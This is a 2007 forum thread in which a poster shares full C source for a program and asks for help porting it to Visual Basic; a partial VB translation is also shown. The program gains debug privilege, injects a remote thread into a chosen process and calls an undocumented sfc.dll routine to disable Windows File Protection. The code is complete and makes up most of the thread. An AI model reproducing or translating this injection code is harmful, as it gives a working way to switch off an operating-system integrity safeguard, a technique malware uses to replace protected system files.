|
-
May 27th, 2007, 04:57 AM
#1
Thread Starter
Lively Member
Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)
I am trying to convert some code from C to VB but the memory API functions really confuse me.
Here is the code:
Code:
----- dwfp2.cpp
#define WIN32_LEAN_AND_MEAN
#define STRICT
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <tlhelp32.h>
#pragma check_stack (off)
DWORD exec_func(FARPROC SfcTerminateWatcherThread)
{
SfcTerminateWatcherThread();
return 0;
}
void after_thread_func(void){}
#pragma check_stack
int adjust_privileges(void);
DWORD get_process_pid(char *);
int inject_thread(DWORD, LPVOID);
int main(int argc, char *argv[])
{
if(argc < 2){
printf("%s [process name]\n", argv[0]);
return 1;
}
FARPROC pSTWT = GetProcAddress(LoadLibrary("sfc.dll"), (LPCSTR)2);
if(pSTWT == NULL){
printf("Error: SfcTerminateWatcherThread\n");
return -1;
}
int err = 0;
if(err = adjust_privileges()){
printf("Error: adjust_privileges:%d\n", err);
return -1;
}
DWORD dwPID;
if((dwPID = get_process_pid(argv[1])) == 0){
printf("Error: get_process_pid\n");
return -1;
}
if(err = inject_thread(dwPID, pSTWT)){
printf("Error: inject_thread:%d\n", err);
return -1;
}
printf("Windows File Protection Disabled.\n");
return 0;
}
int adjust_privileges(void)
{
int ret = 0;
HANDLE hToken = NULL;
try{
if( ! OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
throw 1;
LUID luid;
if( ! LookupPrivilegeValue(NULL, "SeDebugPrivilege", &luid))
throw 2;
TOKEN_PRIVILEGES tk_priv;
tk_priv.PrivilegeCount = 1;
tk_priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tk_priv.Privileges[0].Luid = luid;
if( ! AdjustTokenPrivileges(hToken, FALSE, &tk_priv, 0, NULL, NULL))
throw 3;
}catch(int err){
ret = err;
}
CloseHandle(hToken);
return ret;
}
DWORD get_process_pid(char *psname)
{
DWORD pid = 0;
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hSnap == INVALID_HANDLE_VALUE)
return 0;
PROCESSENTRY32 pe;
pe.dwSize = sizeof(pe);
BOOL bResult = Process32First(hSnap, &pe);
while(bResult){
if( ! strcmp(pe.szExeFile, psname))
pid = pe.th32ProcessID;
bResult = Process32Next(hSnap, &pe);
}
CloseHandle(hSnap);
return pid;
}
int inject_thread(DWORD dwPID, LPVOID pfunc)
{
int ret = 0;
HANDLE hProcess = NULL;
LPVOID remote_mem = NULL;
try{
if((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) == NULL)
throw 1;
remote_mem = VirtualAllocEx(hProcess, NULL,
(SIZE_T)((char *)after_thread_func - (char *)exec_func),
MEM_COMMIT, PAGE_READWRITE);
if(remote_mem == NULL)
throw 2;
BOOL wFlag = WriteProcessMemory(hProcess, remote_mem, (char *)exec_func,
(SIZE_T)((char *)after_thread_func - (char *)exec_func), (SIZE_T *)0);
if(wFlag == FALSE)
throw 3;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)remote_mem, pfunc, 0, NULL);
if(hThread == NULL)
throw 4;
if(WaitForSingleObject(hThread, 10 * 1000) == WAIT_TIMEOUT)
throw 5;
CloseHandle(hThread);
}catch(int err){
if(err > 2)
VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
ret = err;
}
CloseHandle(hProcess);
return ret;
}
-----
Here is what I have so far:
(I stopped at the VirtualAllocEx b/c I am not sure what this means: (SIZE_T)((char *)after_thread_func - (char *)exec_func) )
Code:
Public Sub InjectCode2()
Dim pSFCModule As Long
Dim pSTWT As Long 'SfcTerminateWatcherThread
Dim pDataRemote As Long
Dim lSize As Long
'Get Handles:
pSFCModule = LoadLibrary("sfc.dll")
pSTWT = GetProcAddress2(pSFCModule, 2)
MsgBox pSTWT
'Enable Debug privilege
Call EnableProcessPrivileges(GetCurrentProcessId, SE_Debug)
'Open Process:
Call EnableProcessPrivileges(GetCurrentProcessId, SE_Debug)
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, lPID)
MsgBox hProcess
pDataRemote = VirtualAllocEx(hProcess, 0, lSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
End Sub
-
Jun 14th, 2007, 10:06 AM
#2
Thread Starter
Lively Member
Re: Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|